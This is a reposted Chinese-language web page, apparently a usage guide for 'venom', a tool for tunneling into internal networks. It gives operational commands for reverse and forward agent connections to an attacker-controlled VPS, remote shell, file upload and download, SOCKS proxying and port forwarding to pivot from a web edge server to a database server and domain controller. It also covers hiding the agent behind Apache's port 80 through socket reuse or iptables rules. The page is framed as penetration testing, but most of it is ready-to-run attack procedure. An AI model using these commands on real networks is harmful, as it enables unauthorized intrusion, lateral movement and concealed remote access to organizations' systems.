设为首页收藏本站
开启辅助访问

内网穿透工具

 您所在的位置:网站首页 venom下载 内网穿透工具

内网穿透工具

2023-11-23 23:57| 来源: 网络整理| 查看: 265

venom

反向连接和正向连接

admin节点和agent节点均可监听连接也可发起连接

admin监听端口,agent发起连接:

./admin_macos_x64 -lport 9999 ./agent_linux_x64 -rhost 192.168.0.103 -rport 9999

agent监听端口,admin发起连接:

./agent_linux_x64 -lport 8888 ./admin_macos_x64 -rhost 192.168.204.139 -rport 8888 网络拓扑图 hack(10.1.1.1) ----->vps(1.1.1.1) ------->web边界服务器(2.2.2.2:192.168.1.1)-------> 内网数据库服务器(192.168.1.2:172.16.1.1) dc(172.16.1.2) vps监听 admin.exe -lport 12345 -passwd 123 web服务器 agent.exe -rport 12345 -rhost 1.1.1.1 show 查看会话

getdes 查看会话信息 setdes [info] 添加会话信息 goto [id] 切换会话 listen [lport] 监听 connect [rhost] [rport] 连接venom服务端 sshconnect [user@ip:port] [dport] ssh隧道连接 shell upload [本地文件] [受控机路径] 上传 download [remote_file] [local_file] socks [lport] socks5代理 lforward [lhost] [sport] [dport] rforward [rhost] [sport] [dport]

lforward 127.0.0.1 4444 4444 rforward 192.168.1.1 3389 3389 连接127.0.0.1:3389 rforward 将node1网段的192.168.1.1端口3389转发到admin节点本地的3389端口

在这里插入图片描述

如果要攻击dc goto 1 进入web边界服务器venom socks 1111 配置好代理 [email protected]:1111 拿下数据库服务器,在web服务器上使用 goto 1 反向连接: listen 4444 在数据库服务器上 agent.exe -rport 4444 -rhost 192.168.1.1 -passwd 123 正向连接: connect 192.168.1.2 4444 在数据库服务器上 agent.exe -lport 4444 -passwd 123 反向连接 继续搭建socks代理,可以访问dc

端口复用

agent节点支持端口复用

agent提供了两种端口复用方法

通过SO_REUSEPORT和SO_REUSEADDR选项进行端口复用通过iptables进行端口复用(仅支持Linux平台)

通过venom提供的端口复用功能,在windows上可以复用apache、mysql等在这里插入图片描述 服务的端口,暂时无法复用RDP、IIS等服务端口,在linux上可以复用多数服务端口。被复用的端口仍可正常对外提供其原有服务。

第一种端口复用方法

# 以windows下apache为例 # 复用apache 80端口,不影响apache提供正常的http服务 # -h 的值为本机ip,不能写0.0.0.0,否则无法进行端口复用 ./agent.exe -lhost 192.168.3.144 -reuse-port 80 ./admin.exe -rhost 192.168.3.144 -rport 80

第二种端口复用方法

# 以linux下apache为例 # 需要root权限 sudo ./agent_linux_x64 -lport 8080 -reuse-port 80

这种端口复用方法会在本机设置iptables规则,将reuse-port的流量转发到lport,再由agent分发流量

需要注意一点,如果通过sigterm,sigint信号结束程序(kill或ctrl-c),程序可以自动清理iptables规则。如果agent被kill -9杀掉则无法自动清理iptables规则,需要手动清理,因为agent程序无法处理sigkill信号。

为了避免iptables规则不能自动被清理导致渗透测试者无法访问80端口服务,所以第二种端口复用方法采用了iptables -m recent通过特殊的tcp包控制iptables转发规则是否开启。

这里的实现参考了 https://threathunter.org/topic/594545184ea5b2f5516e2033

# 启动agent在linux主机上设置的iptables规则 # 如果rhost在内网,可以使用socks5代理脚本流量,socks5代理的使用见下文 python scripts/port_reuse.py --start --rhost 192.168.204.135 --rport 80 # 连接agent节点 ./admin_macos_x64 -rhost 192.168.204.135 -rport 80 # 如果要关闭转发规则 python scripts/port_reuse.py --stop --rhost 192.168.204.135 --rport 80


【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3